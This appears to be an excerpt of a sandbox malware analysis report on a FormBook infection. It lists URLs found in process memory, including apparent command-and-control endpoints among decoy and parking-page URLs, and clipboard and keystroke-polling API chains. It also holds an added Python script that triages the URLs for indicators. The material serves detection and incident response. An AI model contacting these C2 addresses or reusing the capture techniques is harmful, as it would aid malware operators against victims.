            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.bfiworkerscomp.com/Discussion_Forums.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2B
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.bfiworkerscomp.com/Dream_Job_Search.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2Bt
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.bfiworkerscomp.com/Free_Downloads.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2BtVz
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.bfiworkerscomp.com/Venture_Capital_Firms.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiworkerscomp.com
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.bfiworkerscomp.com/__media__/js/trademark.php?d=bfiworkerscomp.com&type=ns
            Source: ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3768529485.00000000052AE000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.dmtxwuatbz.cc
            Source: ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3768529485.00000000052AE000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.dmtxwuatbz.cc/lfkn/
            Source: clip.exe, 00000009.00000002.3768118603.0000000006368000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000041C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.domaintechnik.at/data/gfx/dt_logo_parking.png
            Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn.consentmanager.net
            Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: clip.exe, 00000009.00000002.3768118603.00000000061D6000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000004036000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: clip.exe, 00000009.00000002.3768118603.00000000061D6000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000004036000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: clip.exe, 00000009.00000002.3768118603.00000000061D6000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000004036000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://delivery.consentmanager.net
            Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
            Source: clip.exe, 00000009.00000002.3758257175.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: clip.exe, 00000009.00000002.3758257175.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: clip.exe, 00000009.00000002.3758257175.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: clip.exe, 00000009.00000002.3758257175.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: clip.exe, 00000009.00000002.3758257175.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: clip.exe, 00000009.00000002.3758257175.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: clip.exe, 00000009.00000003.1666924999.0000000007CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=
            Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
            Source: clip.exe, 00000009.00000002.3768118603.0000000006368000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000041C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif
            Source: clip.exe, 00000009.00000002.3768118603.0000000006368000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000041C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/sslserver.png
            Source: clip.exe, 00000009.00000002.3768118603.0000000006368000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000041C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/contao.png
            Source: clip.exe, 00000009.00000002.3768118603.0000000006368000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000041C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/gallery.png
            Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
            Source: clip.exe, 00000009.00000002.3768118603.00000000053B4000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003214000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1774720636.0000000039E24000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&YbCL=0lpTRQcDUH
            Source: clip.exe, 00000009.00000002.3768118603.00000000053B4000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003214000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1774720636.0000000039E24000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&amp;YbCL=0lpTRQcDUH
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
            Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l
            Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_
            Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lan
            Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l
            Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&
            Source: clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&amp;reg_source=parking_auto
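The URL strings above were carved from the memory of clip.exe and ftlDDsmJxbqfWuvUNSEx.exe, and only a few of them matter: FormBook's configuration carries a list of decoy domains next to the real C2, so parked-domain assets (loopia, reg.ru, domaintechnik.at), browser default search URLs (ecosia, duckduckgo, yahoo) and CDN scripts sit beside the short single-segment paths such as /lfkn/ and /w6qg/. The following Python is an added example, not part of the Joe Sandbox report: it parses such entries, merges the HTML-escaped duplicate (`&amp;`), records which processes held each URL, and separates candidate C2 URLs from the residue. The path pattern used for "candidate_c2" and the host allow-lists are assumptions of this example, not sandbox logic, and the sample lines are copied from the entries above.

```python
"""Triage the 'String found in binary or memory' URL entries of a sandbox report.

Added example, not part of the Joe Sandbox report.  Classification rules are
assumptions: FormBook C2 URLs are taken to use one short alphanumeric path
segment, and the host sets below are a hand-made allow-list of known residue.
"""
import html
import re
from urllib.parse import urlparse

# Constructed sample input: report entries copied from the section above.
SAMPLE_LINES = [
    "Source: ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3768529485.00000000052AE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dmtxwuatbz.cc",
    "Source: ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3768529485.00000000052AE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dmtxwuatbz.cc/lfkn/",
    "Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=",
    "Source: clip.exe, 00000009.00000002.3768118603.00000000053B4000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003214000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1774720636.0000000039E24000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&YbCL=0lpTRQcDUH",
    "Source: clip.exe, 00000009.00000002.3768118603.00000000053B4000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003214000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1774720636.0000000039E24000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&amp;YbCL=0lpTRQcDUH",
    "Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin",
    "Source: clip.exe, 00000009.00000002.3768118603.00000000061D6000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000004036000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js",
]

# The report fuses the source column and the description column ("...sdmpString found ...").
ENTRY_RE = re.compile(r"^Source:\s*(?P<sources>.+?)String found in binary or memory:\s*(?P<url>\S+)\s*$")
PROCESS_RE = re.compile(r"([\w.-]+\.exe)")
# Assumption: a FormBook C2 URL has exactly one short alphanumeric path segment (/lfkn/, /w6qg/).
C2_PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")
# Assumption: hand-made allow-lists for residue seen in browser memory and on parking pages.
BROWSER_DEFAULT_HOSTS = {"duckduckgo.com", "ac.ecosia.org", "cdn.ecosia.org", "www.ecosia.org",
                         "ch.search.yahoo.com", "login.live.com"}
WEB_ASSET_HOSTS = {"cdnjs.cloudflare.com", "www.googletagmanager.com",
                   "cdn.consentmanager.net", "delivery.consentmanager.net"}
PARKING_MARKERS = ("parking", "underconstruction")


def parse_entries(lines):
    """Yield (url, processes) per entry; &amp; is unescaped so HTML-encoded copies merge."""
    for line in lines:
        m = ENTRY_RE.match(line)
        if not m:
            continue
        yield html.unescape(m["url"]), set(PROCESS_RE.findall(m["sources"]))


def classify(url):
    """Assign one category to a URL; C2 pattern wins over every allow-list."""
    parts = urlparse(url)
    host = (parts.hostname or "").lower()
    if C2_PATH_RE.match(parts.path):
        return "candidate_c2"
    if host in BROWSER_DEFAULT_HOSTS:
        return "browser_default"
    if host in WEB_ASSET_HOSTS:
        return "web_asset"
    if any(marker in url.lower() for marker in PARKING_MARKERS):
        return "parking_page"
    return "unclassified"


def triage(lines):
    """Return {url: {"processes": [...], "category": ...}} with duplicates merged.

    A bare host (http://www.dmtxwuatbz.cc) is promoted to candidate_c2 when the
    same host also occurs with a C2-style path, so the host is not lost as an IOC.
    """
    records = {}
    for url, procs in parse_entries(lines):
        rec = records.setdefault(url, {"processes": set(), "category": classify(url)})
        rec["processes"] |= procs
    c2_hosts = {urlparse(u).hostname for u, r in records.items() if r["category"] == "candidate_c2"}
    for url, rec in records.items():
        if rec["category"] == "unclassified" and urlparse(url).hostname in c2_hosts:
            rec["category"] = "candidate_c2"
        rec["processes"] = sorted(rec["processes"])
    return records


def candidate_c2(lines):
    """Sorted list of URLs worth blocking or hunting for."""
    return sorted(u for u, r in triage(lines).items() if r["category"] == "candidate_c2")


if __name__ == "__main__":
    for url, rec in triage(SAMPLE_LINES).items():
        print(f"{rec['category']:16} {url}  ({', '.join(rec['processes'])})")
```

Run on the full set of entries the script leaves parking and CDN hosts out of the IOC list; a URL that lands in "unclassified" is the one to look at by hand, because an allow-list miss and an unknown C2 look the same to this heuristic.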
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E8425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,4_2_00E8425A
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E84458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_00E84458
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E70219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,4_2_00E70219
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E9CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,4_2_00E9CDAC

            E-Banking Fraud

            Source: Yara matchFile source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
